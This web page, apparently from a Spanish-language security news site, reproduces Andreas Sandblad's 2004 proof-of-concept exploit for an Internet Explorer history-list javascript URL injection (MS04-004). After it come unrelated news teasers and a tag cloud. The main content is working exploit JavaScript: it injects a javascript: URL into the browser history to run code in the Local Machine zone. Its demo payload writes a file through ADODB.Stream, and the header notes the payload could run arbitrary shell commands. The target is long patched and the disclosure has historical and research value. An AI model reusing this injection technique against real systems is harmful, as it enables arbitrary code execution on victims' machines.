Internet Explorer url javascript injection in history list (MS04-004)


Andreas Sandblad, 2004-02-03, patched by MS04-004
Purpose: Run payload code called from Local Machine zone.
The code may be arbitrary such as executing shell commands.

This demo simply creates a harmless textfile on the desktop.





function payload() {
file = \"sandblad.txt\";
o = new ActiveXObject(\"ADODB.Stream\");
o.Open();
o.Type=2;
o.Charset=\"ascii\";
o.WriteText(\"You are vulnerable!\");
o.SaveToFile(file, 2);
o.Close();
alert(\"File \"+file+\" created on desktop!\");
}
// Name: trigger
// Purpose: Inject javascript url in history list and run payload
// function when the user hits the backbutton.
function trigger(len) {
if (history.length != len)
payload();
else
return \"-onload=external.NavigateAndFind(\'res:\',\'\',\'\')>\";
}
// Name: backbutton
// Purpose: Run backbutton exploit.
function backbutton() {
location = \'javascript:\'+trigger+payload+\'trigger(\'+history.length+\')\';
}
// Launch backbutton exploit on load
if (confirm(\"Press OK to run backbutton exploit!\"))
backbutton();


Otras noticias de interés:

Primer programa legal Linux que corre en XBox.
El primer programa Linux que corre legalmente sobre Xbox acaba de ser liberado. ...
Google actualiza Postini para frenar ataques de JavaScript
El equipo de seguridad de Google ha mejorado el motor de Postini para frenar un nuevo tipo de ataque JavaScript causante del reciente incremento en los volúmenes de spam de los últimos meses....
El 60% del malware por keywords es rogue
Según un estudio realizado por Google, los falsos antivirus son los códigos maliciosos más utilizados en la propagación de malware vía Web, específicamente a través de publicidades....
Disponible eZine Cotejo N° 4
Esta disponible para su lectura/descarga el número 4 de la eZine Cotejo de Vaslibre, la revista digital referente al Software Libre (GNU/Linux). Revista digital bimensual. Disfrutenla!...
Microsoft Windows Metafile (WMF) "SetAbortProc" Remote Code Execution Exploit
Exploit publicado en frsirt.com que ataca Microsoft Windows Metafile (WMF) causando una ejecución de código malicioso....
El virus que ataca a Firefox
Este curioso virus envia una alerta mostrando una imagen indicandote que uses Internet Explorer. ...
Gusano que se extiende a través de Yahoo! Messenger
El malware se esconde detrás de un mensaje que simula ser una fotografía de un amigo y que, además de reenviarse a los contactos de Yahoo Instant Messenger, puede cambiar las claves de registro....
Ejecución de código no corregida por parche MS07-012
Una vulnerabilidad en el componente MFC (Microsoft Foundation Classes) de Microsoft, que permite la ejecución remota de código, podría ser explotada por un usuario malicioso, aún después de la instalación de un parche ya publicado (MS07- ...
La universidad canadiense de Lakehead prohibe las redes WiFi por supuestos riesgos para la salud.
La universidad de Lakehead, en Ontario, Canadá, ha eliminado las conexiones Wi-Fi a aquellos lugares donde no se pueda acceder a Internet mediante fibra óptica....
La burbuja de VMWare
La virtualización supuso un boom y sin lugar a dudas el mayor protagonista, en cuanto a ganancias económicas y de usuarios fue VMWare. Pasado el boom de la virtualización, con las mejoras introducidas por las compañías de hardware, AMD e Intel e...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploits
  • explorer
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • history
  • hosting
  • informatica
  • injection
  • internet
  • isos
  • javascript
  • libre
  • licencias
  • linux
  • linuxmint
  • list
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • url
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra